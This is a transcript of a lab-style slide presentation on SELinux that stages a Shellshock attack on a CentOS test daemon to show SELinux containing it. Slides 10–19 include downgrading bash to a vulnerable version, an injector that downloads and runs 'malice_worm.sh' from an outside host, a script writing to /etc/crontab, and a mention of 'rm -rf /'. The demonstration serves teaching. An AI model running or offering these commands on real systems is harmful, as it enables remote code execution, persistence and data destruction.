Presentation is loading. Please wait.

Presentation is loading. Please wait.

The SELinux of First Look. Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather.

Published byPhillip Parker Modified over 8 years ago

Similar presentations

Presentation on theme: "The SELinux of First Look. Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather."— Presentation transcript:

1 The SELinux of First Look

2 Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather than understand why it’s always denying access and its worth.

3 Content Introduce SELinux Talk about some vulnerabilities around us Attack tests with or without SELinux Summary

4 SELinux Security-Enhanced Linux (SELinux) is a mandatory access control (MAC) security mechanism implemented in the kernel.

5 SELinux Policy The SELinux Policy is the set of rules that guide the SELinux security engine. It defines types for file objects and domains for processes. It uses roles to limit the domains that can be entered, and has user identities to specify the roles that can be attained. In essence, types and domains are equivalent, the difference being that types apply to objects while domains apply to processes.

6 Access Control Model Type Enforcement (TE): –Type Enforcement is the primary mechanism of access control used in the targeted policy Role-Based Access Control (RBAC): –Based around SELinux users (not necessarily the same as the Linux user), but not used in the default targeted policy Multi-Level Security (MLS): –Not commonly used and need install specific mls policy.

7 What Can SELinux do? SELinux does not block the exploit but it would prevent escalation of confined domains:SELinux can contain the exploits and reduce their influence.

8 Cyber Vulnerabilities In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw[1]. [1]"The Three Tenets of Cyber Security". U.S. Air Force Software Protection Initiative. Retrieved 2009-12-15

9 Major Events HeartBleed(CVE-2014-0160) Shellshock(CVE-2014-6271) …

10 Attack Step 1 1.Make sure Shellshock is not patched. –If your bash’s version is higher than 4.2.45(1), you need downgrade it to 4.2.45(1) or lower versions.

11 Open Loophole –Not necessary Wget http://test.njucs-os.tk/selinuxtest/bash- 4.2.45-5.el7.x86_64.rpmhttp://test.njucs-os.tk/selinuxtest/bash- 4.2.45-5.el7.x86_64.rpm Yum downgrade bash-4.2.45-5.el7.x86_64.rpm –Wget http://test.njucs- os.tk/selinuxtest/region_date_daemonhttp://test.njucs- os.tk/selinuxtest/region_date_daemon –Wget http://test.njucs-os.tk/selinuxtest/start.shhttp://test.njucs-os.tk/selinuxtest/start.sh –Run start.sh

12 Attack Step 2 Test Shellsock

13 Attack Step 3 3. Run it to display current date based on TCP. It will display the current date and time in the given format by inputing local-info. Example:

14 Attack Step 4 4.Change the files contexts –If selinux is enabled, the behavior of date_daemon will be restricted in its domain by the context.

15 Attack Step 5 5.Prepare “malicious” script Injector. 1.#!/bin/bash 2. 3.now=$(date) 4.echo "$now: Your OS is pwned!" 5.echo "$now: Your OS is pwned!" >> /tmp/pwn.log 6.echo "# $now: Your OS is pwned!" >> /etc/crontab It is a very friendly malicious script! :P

16 Attack Tests In the test, we write a daemon running in the CentOS 7.0.1406 with SElinux in enforcing-mode or permissive-mode, let's run a designed Shellsock attack on it. The set of commands made up for this test Injector.sh: –rm malice_worm.sh ; –wget --no-verbose --output-document=malice_worm.sh http://test.njucs- os.tk/selinuxtest/malice_worm.sh; –rm injector.sh ; –bash malice_worm.sh

17 Attack Step 6 6.Attack OS with SELinux

18 Attack Step 7 7.Attack OS without SELinux

19 What-If… What would be happen If the script “rm –rf /” was put in the Injector.

20 Awesome SElinux protects your OS even if you have software security failing. How does selinux accomplish this protection task? –Utilize control points of objects in the system.

21 Control Point The following types are used with DHCP: dhcp_etc_t –This type is mainly used for files in the /etc/ directory, including configuration files. dhcpd_var_run_t –This type is used for the PID file for dhcpd, in the /var/run/ directory. dhcpd_exec_t –This type is used for transition of DHCP executable files to the dhcpd_t domain. dhcpd_initrc_exec_t –This type is used for transition of DHCP executable files to the dhcpd_initrc_t domain.

22 But the type of crontab is system_cron_spool_t, the process running as dhcpd_exec_t is not allowed to write to /etc/crontab.

23 Graphic Interpretation Without SELinuxWith SELinux

24 Conclusion SELinux does not block the exploit but it would prevent escallation of confined domains. Base SELinux we can build more enhanced security protection mechanism.

25 Thank you!

Download ppt "The SELinux of First Look. Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather."

Similar presentations

JENNIS SHRESTHA CSC 345 April 22, 2014. Contents Introduction History Flux Advanced Security Kernel Mandatory Access Control Policies MAC Vs DAC Features.

JENNIS SHRESTHA CSC 345 April 22, Contents Introduction History Flux Advanced Security Kernel Mandatory Access Control Policies MAC Vs DAC Features.
MCDST 70-271: Supporting Users and Troubleshooting a Microsoft Windows XP Operating System Chapter 7: Troubleshoot Security Settings and Local Security.

MCDST : Supporting Users and Troubleshooting a Microsoft Windows XP Operating System Chapter 7: Troubleshoot Security Settings and Local Security.
1 Defining System Security Policies. 2 Module - Defining System Security Policies ♦ Overview An important aspect of Network management is to protect your.

1 Defining System Security Policies. 2 Module - Defining System Security Policies ♦ Overview An important aspect of Network management is to protect your.
Title of Selected Paper: Design and Implementation of Secure Embedded Systems Based on Trustzone Authors: Yan-ling Xu, Wei Pan, Xin-guo Zhang Presented.

Title of Selected Paper: Design and Implementation of Secure Embedded Systems Based on Trustzone Authors: Yan-ling Xu, Wei Pan, Xin-guo Zhang Presented.
By: Arpit Pandey SELINUX (SECURITY-ENHANCED LINUX)

By: Arpit Pandey SELINUX (SECURITY-ENHANCED LINUX)
70-293: MCSE Guide to Planning a Microsoft Windows Server 2003 Network, Enhanced Chapter 13: Planning Server and Network Security.

70-293: MCSE Guide to Planning a Microsoft Windows Server 2003 Network, Enhanced Chapter 13: Planning Server and Network Security.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 9: Implementing and Using Group Policy.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 9: Implementing and Using Group Policy.
1 Flexible Mandatory Access Control (MAC) in Modern Operating Systems Jeffrey H. Jewell CS 591 December 7, 2009 Jeffrey H. Jewell CS 591 December 7, 2009.

1 Flexible Mandatory Access Control (MAC) in Modern Operating Systems Jeffrey H. Jewell CS 591 December 7, 2009 Jeffrey H. Jewell CS 591 December 7, 2009.
Chapter 9 Building a Secure Operating System for Linux.

Chapter 9 Building a Secure Operating System for Linux.
SELinux (Security Enhanced Linux) By: Corey McClurg.

SELinux (Security Enhanced Linux) By: Corey McClurg.
Security-Enhanced Linux Joseph A LaConte CS 522 December 8, 2004.

Security-Enhanced Linux Joseph A LaConte CS 522 December 8, 2004.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 9: Implementing and Using Group Policy.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 9: Implementing and Using Group Policy.
Shane Jahnke CS591 December 7, 2009.  What is SELinux?  Changing SELinux Policies  What is SLIDE?  Reference Policy  SLIDE  Installation and Configuration.

Shane Jahnke CS591 December 7,  What is SELinux?  Changing SELinux Policies  What is SLIDE?  Reference Policy  SLIDE  Installation and Configuration.
7-Access Control Fundamentals Dr. John P. Abraham Professor UTPA.

7-Access Control Fundamentals Dr. John P. Abraham Professor UTPA.
ADVANCED LINUX SECURITY. Abstract : Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation.

ADVANCED LINUX SECURITY. Abstract : Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation.
Security-Enhanced Linux & Linux Security Module The George Washington University CS297 Programming Language & Security YU-HAO HU.

Security-Enhanced Linux & Linux Security Module The George Washington University CS297 Programming Language & Security YU-HAO HU.
Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.

Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.
Chapter 4: Security Baselines Security+ Guide to Network Security Fundamentals Second Edition.

Chapter 4: Security Baselines Security+ Guide to Network Security Fundamentals Second Edition.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 9: Implementing and Using Group Policy.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 9: Implementing and Using Group Policy.

Similar presentations

Ads by Google